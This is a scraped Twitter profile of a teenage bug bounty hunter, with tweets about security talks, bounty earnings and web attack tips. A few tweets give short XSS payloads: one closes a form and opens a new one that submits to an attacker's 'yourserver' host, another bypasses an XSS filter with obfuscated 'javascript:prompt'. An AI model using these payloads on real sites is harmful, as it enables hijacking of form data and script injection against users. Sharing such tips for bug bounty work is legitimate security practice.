Samet SAHIN

@sametsahinnet

16 y/o bug hunter! I share tips & tricks about Bug Bounty and Web Application Security Learning to develop new web attack vectors 🕷️

Vrijeme pridruživanja: lipanj 2013.

Tweetovi

Blokirali ste korisnika/cu @sametsahinnet

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @sametsahinnet

  1. Prikvačeni tweet
    31. pro 2019.

    In 2019; I earned people more than my bounties 🎉 I want to talk at conferences or big organisations. This is one of my

    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet
    31. sij

    Dijital dünyayı kendisinin ve çevresinin faydasına dönüştüren "hata avcısı" ile şimdi TRT Radyo1 programımızda, yeni çağın yeni becerisini konuşuyoruz. Dinlemek için;

    , , i još njih 5
    Prikaži ovu nit
    Poništi
  3. 30. sij

    Yarın ile Bug Bounty hakkında konuşacağız. Bug bounty öğrenmek isteyenler kaçırmasın :)

    Poništi
  4. 29. sij
    Prikaži ovu nit
    Poništi
  5. 29. sij

    If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    20. sij

    First blog post: Unauthorized Google Maps API Key Usage Cases, and Why You Need to Care

    Poništi
  7. 11. sij

    I hacked PayPal again :) (Ethically)

    Poništi
  8. 31. pro 2019.

    It can not be happen without and Thank you to all Community!

    Prikaži ovu nit
    Poništi
  9. 26. pro 2019.

    I completed my 2 goal in 2019 🎉 * Gave 5/5 talks in Turkey * Earned $20.000+/$10.000

    Poništi
  10. proslijedio/la je Tweet
    24. pro 2019.

    Writeup on how I made $40,000 breaking the new Chromium Edge using essentially two XSS flaws.

    Poništi
  11. 22. pro 2019.

    My last reports on 😁 I hope I will doubling my 2019 goal with these reports.

    Poništi
  12. 7. pro 2019.

    Here is a blog and trick about : "Javascript File Inclusion via a Simple Link Injection" : Even a Simple Link Injection can be very harmful. Depends on where it is.

    Poništi
  13. proslijedio/la je Tweet
    21. stu 2019.

    Bugün ⁦⁩ ⁦⁩’de bize Web Uygulama Güvenliği anlattı :)

    Poništi
  14. 16. stu 2019.

    Eh, kaçırmamak gerek :) Zamanı olan ve Bug Bounty'e ilk adımı atmayı isteyenleri beklerim.

    Poništi
  15. 30. lis 2019.
    Poništi
  16. 11. lis 2019.
    Poništi
  17. 21. ruj 2019.

    Mükemmel bir etkinlikti. Organizatörlere ve katılan arkadaşlara çok teşekkür ederim ! :)

    Poništi
  18. 17. ruj 2019.

    21 Eylül Cumartesi TOBB Üniversite'sinde Hakkında konuşacağız. Vakti olan herkesi beklerim :) katılmak için DM.

    Poništi
  19. 7. ruj 2019.

    One line Subdomain Discover Code : curl -fsSL "" | sort -n | uniq -c | grep -o -P '(?<=\<TD\>).*(?=\<\/TD\>)' | sed -e '/white-space:normal/d'

    Poništi
  20. 4. ruj 2019.

    I bypassed an interesting xss protection with : %3c<aa+ONLOAD+href=javasONLOADcript:promptONLOAD(1)%3e

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·